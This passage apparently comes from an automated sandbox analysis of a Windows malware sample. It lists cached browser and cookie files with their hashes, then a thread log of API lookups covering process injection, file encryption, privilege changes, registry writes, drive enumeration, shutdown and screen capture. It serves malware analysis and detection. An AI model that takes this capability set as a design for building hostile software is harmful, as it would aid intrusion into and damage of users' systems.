SHA256: eb192368bd6677a889c70e4225d709baa19c2ac38c07c8fe116ff0da59deae00
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\yylw[1].txt 0.23 KB (236 bytes) MD5: 41f4b78b882df2ab9fdf5c2c60cc7c85
SHA1: 75d27da1d973a5d0bc1f246834e5e22591ca2732
SHA256: 905aa522a93e407c554a064d451edbd8f25f8afb70cbb0ab10d6a553aaeef1b6
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a6egg[1].txt 348.46 KB (356824 bytes) MD5: f7ae0d06a19a33310f2b33a9b91a0916
SHA1: c35f57e13fb999aeb678c8117af70714e5f38e9c
SHA256: 2d801bf8ce180123c447ef817c9385c298d1c08fb04a9f49042cd42e9e00f959
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qfmq[1].txt 5.65 KB (5784 bytes) MD5: ff63baf8441314e99b50f8e6205f2df8
SHA1: 1c5e1270872b75f9a1503ddc7bb22532257a8ed9
SHA256: 45b9ee8eb14ffc3692481095527cd8cc889b586f122ab5e43c0bb40ae390ef41
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\oa[1].txt 5.65 KB (5784 bytes) MD5: ca0cc8ffcff1a13be2752132a8167d6b
SHA1: 3c0265be2ab965bf0ebf9382717bef9b815bec36
SHA256: 48b849dc7205c10f1daf557ea8e05a633bb9646eb1da5da89aac17c02014c0ad
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\3q2naw[1].txt 3.15 KB (3224 bytes) MD5: 5dee0de1d90631b1fb9a8de697045c67
SHA1: bb4d81d7b0352e350ac345ae367c58cd8049017a
SHA256: c4da2e282d7bfa3faf20529d0e97b1baf05c41344e1da97a64e5ad96e1ec96f8
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt 156.73 KB (160492 bytes) MD5: f0acdd87a868572d89fe58cc771a4f44
SHA1: e12103983b81e7c4e19c7e432ae0736a028024dd
SHA256: 308880082e52bef445ba6ff2ac9fc91bceb550569768d2060114aa14a84a76fb
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\spsra[1].txt 200.17 KB (204972 bytes) MD5: 9cbb4d0e76c226eb847c4ef1a8b0d39c
SHA1: cff19e3d50f60e32157747873ba9e87cb1231de6
SHA256: f000b6a915fa937d682aa56bccc5b1c5c84df5c6de526a2ecb59a3399e4c49d6
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt 167.56 KB (171584 bytes) MD5: e00b057f92a763e5b783ca24b94a26ce
SHA1: c3b90637188b48431e1aea880a49393e669a300c
SHA256: 998b2fd31f18b2a97a5ab0548f5ea02d71f1f6bf69800e9b2d5b98db16322c2f
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt 0.27 KB (279 bytes) MD5: 90de1992ceb330537fee8db14d5fd987
SHA1: b05f7371ddbfc73d7393445bd8d52048289f0a4f
SHA256: 6ea48ebb47ac6309a8a5d275563df6aaa2ad1a68f5a26dc2530d9a39ef9dd231
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt 0.27 KB (278 bytes) MD5: 7e2935c87edf38621c63511a6cc5e1e3
SHA1: 148686c9adafa08e6d55351479da7be5b0bcf064
SHA256: d08ddc5f3a9bb51961871f0b0a8c840adb5828c8a986f1a730e330fef876c44f
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt 48.62 KB (49791 bytes) MD5: 9b930032eac8c180ed70390aee88903c
SHA1: 843bfe71d4c57d9fe1e0c8d270603ea4bd5f269f
SHA256: 888f2001ace08ab500701ae57772967f6b7df6b0c35a5472802077ef81289adb
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt 0.19 KB (192 bytes) MD5: 309cd930b3d4df7998a5aeb8f61ab194
SHA1: 9fe5095d059406cd2f92d58b9ac148cd5897450c
SHA256: fa3faba658be48400f8847bcf6f792362fbfd422ef8f80ba31ba4b02f346e609
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt 36.40 KB (37272 bytes) MD5: 3ecca40e5dc9f0107f5d9ae500177878
SHA1: 947876a5a40257ba6da4021ad4bc8b5317dbdd03
SHA256: 5947ddcc53d38842b7e5bf1aaab70822f2982fe1859183304c2ebd3e5d2f72f0
False
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat 256.00 KB (262144 bytes) MD5: 8ed682d01fa076cced515bf6b21ba022
SHA1: e69667b35d101d9cd052697da198c40a88e16e74
SHA256: 4abb12ce35853bda9c190e84a3329ab50701e035b92436eba8f4ddf9b96e4e6c
False
Threads
Thread 0x11c
(Host: 230, Network: 0)
+
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 True 1
Fn
